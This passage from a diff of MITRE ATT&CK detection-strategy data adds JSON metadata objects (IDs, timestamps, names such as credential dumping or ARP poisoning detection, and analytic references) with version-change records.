+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0085",
+                            "external_id": "DET0085"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Credential Dumping from SAM via Registry Dump and Local File Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8c881d82-21c3-482c-8895-c240360eec8e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8b8cfd0f-bbe2-417b-b1d2-eebf84d3f008",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0234",
+                            "external_id": "DET0234"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Credential Dumping via Sensitive Memory and Registry Access Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5a5d5ff5-e2bb-4ba9-9f95-504c86b1a1cf",
+                        "x-mitre-analytic--82cdec5a-52af-4489-b002-b0256e5ba60e",
+                        "x-mitre-analytic--29370f2b-0877-458c-8ade-a9a23b8fb7b2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--630ea167-088b-4958-ac19-0fc59310e262",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0460",
+                            "external_id": "DET0460"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Credential Stuffing Detection via Reused Breached Credentials Across Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e3e2d59b-220f-43b0-9891-7b299be27c50",
+                        "x-mitre-analytic--95d381e5-f2d6-4164-9917-57f9b070333b",
+                        "x-mitre-analytic--e2f104ac-b21a-4c48-8987-3e0ad73997df",
+                        "x-mitre-analytic--24e6cefb-6e1c-4676-9bb8-74f6a731703c",
+                        "x-mitre-analytic--cfff571f-eb6b-41e2-a447-f69bc07aa77a",
+                        "x-mitre-analytic--4a930e8d-75eb-469d-82d8-1e1d5764a6d4",
+                        "x-mitre-analytic--23c7fff8-de08-49dd-a101-0c35ad40bd7e",
+                        "x-mitre-analytic--1b3bbeab-2000-47d6-88f9-8ed519f9bed6",
+                        "x-mitre-analytic--de41a23b-b07d-411b-80f7-d1a8f55ba459"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f9d25557-f87b-4920-a98b-8a3c9df4bfce",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0591",
+                            "external_id": "DET0591"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-Platform Behavioral Detection of File Timestomping via Metadata Tampering",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--475a8817-1ace-4bef-baaa-0f56979eb85a",
+                        "x-mitre-analytic--632f7aef-f848-4147-95fa-2052bd373576",
+                        "x-mitre-analytic--097ce8cb-9a38-4c8a-836c-cee15ccdf258",
+                        "x-mitre-analytic--1c3cb010-1c22-40c8-92d3-52e31353ad92"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--195e8d37-dfe6-4dc8-8012-dc80984872aa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0063",
+                            "external_id": "DET0063"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-Platform Behavioral Detection of Python Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f392a2cb-dd4b-4585-84d5-1fa4bd65ff60",
+                        "x-mitre-analytic--bcac4672-778d-4b35-8b75-eaaf84b91853",
+                        "x-mitre-analytic--59354e08-ed82-4b95-99c5-aed3996473e1",
+                        "x-mitre-analytic--aff39b79-72c6-4cf9-8ddf-1332252580d5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--df11466a-27a2-4cb1-bf73-2a3a4aaee0d9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0094",
+                            "external_id": "DET0094"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-Platform Behavioral Detection of Scheduled Task/Job Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a0714b4d-5dbf-499e-a737-7b00478267ee",
+                        "x-mitre-analytic--3374a404-06f9-4b32-bf94-5ac688fb9dad",
+                        "x-mitre-analytic--8cbda989-39e6-4f9e-8e23-213f92b3479d",
+                        "x-mitre-analytic--d20d7cf8-ecac-4011-96e0-3ec862223c11",
+                        "x-mitre-analytic--e5adcc7e-5d68-4080-bb87-e901f297485d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6bab4067-9bfc-4e7f-b7fc-e578acd81e6a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0290",
+                            "external_id": "DET0290"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-Platform Detection of Cron Job Abuse for Persistence and Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0fbbc547-37a7-4d00-a8a4-5fbcf3d27a1e",
+                        "x-mitre-analytic--8a764f0e-4bcd-413d-bbf0-1a10cb98b598",
+                        "x-mitre-analytic--3ea6b02e-47e0-4815-9190-4e95eb51e779"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--22a31282-d190-449b-a102-2d562f906b7d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0573",
+                            "external_id": "DET0573"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-Platform Detection of Data Transfer to Cloud Account",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--383dda28-1d76-4605-a53d-07829f3d7ef8",
+                        "x-mitre-analytic--60b2d6f4-1bf0-4c52-8923-ac8e3b8088d4",
+                        "x-mitre-analytic--d1ef9a86-7781-4b9e-9178-c2e5b1782c1f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6dd441e4-d264-4f7f-b145-9c122955c532",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0264",
+                            "external_id": "DET0264"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-Platform Detection of JavaScript Execution Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3f257014-01d4-487d-980c-77d4d2130315",
+                        "x-mitre-analytic--af3dff40-40be-40dd-9a0e-a47cf052880b",
+                        "x-mitre-analytic--26520d1c-1e0a-443b-817e-7ec1846a0476"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ca20fecb-6b8e-49ae-9ecf-19f4edd812ad",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0333",
+                            "external_id": "DET0333"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-Platform Detection of Scheduled Task/Job Abuse via `at` Utility",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b9f79a81-9fee-47f2-bef8-a9f64fde935e",
+                        "x-mitre-analytic--70e28077-c8a6-425f-94c7-a74a7140c7ce",
+                        "x-mitre-analytic--98ce32fb-1b91-4487-9e5a-951375f2380e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2cbbc0b5-2c4b-4861-91d3-1f64a47ef191",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0090",
+                            "external_id": "DET0090"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Cross-host C2 via Removable Media Relay",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b355ae5d-3cd6-4594-8bd9-8fed59e02326",
+                        "x-mitre-analytic--6f8fdb88-56d1-454e-9a35-3b7170011ca2",
+                        "x-mitre-analytic--bb687663-4b26-46ef-a176-e188f538d399"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2d5f2445-a395-4012-b378-c953f2df7353",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0238",
+                            "external_id": "DET0238"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Defacement via File and Web Content Modification Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d02dbf1d-b6e9-4c3c-84a2-f70fec797504",
+                        "x-mitre-analytic--7b95ffd7-165d-4435-97b6-4508b9328d89",
+                        "x-mitre-analytic--3258db60-8500-4935-837c-78b23f2d83d1",
+                        "x-mitre-analytic--0e7e1861-14be-4862-8cba-6344e6e196f2",
+                        "x-mitre-analytic--bd893675-a17e-4c3b-bec4-ffbad6986c73"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--99758bfb-f638-43aa-a233-d27646452116",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0387",
+                            "external_id": "DET0387"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect ARP Cache Poisoning Across Linux, Windows, and macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dc4a80e3-7670-474f-aaf6-c051d5dda83c",
+                        "x-mitre-analytic--5ee16525-5e86-4634-aa75-37468c4034c4",
+                        "x-mitre-analytic--0f996058-7524-4759-9d88-a8997e90ff3c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d881e35b-5401-46c0-b966-8880c64681ab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0113",
+                            "external_id": "DET0113"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect AS-REP Roasting Attempts (T1558.004)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7687688c-f91c-4487-948e-1d5b372fcdac"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--96c3e267-9dde-45cb-b700-e27c1a672cf8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0224",
+                            "external_id": "DET0224"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Abuse of Component Object Model (T1559.001)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8a7a7e80-c28e-42b2-a222-c1d75932c986"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8ca072de-1c09-4e19-acd2-e4228681030c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0198",
+                            "external_id": "DET0198"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Abuse of Container APIs for Credential Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2d054232-8968-4d11-b742-536b70bbb1ba"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3f3ebc58-fff0-4083-bc5c-ee7308026a20",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0504",
+                            "external_id": "DET0504"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Abuse of Dynamic Data Exchange (T1559.002)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d9383849-c91c-4eef-88a0-97c2454ca1af"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
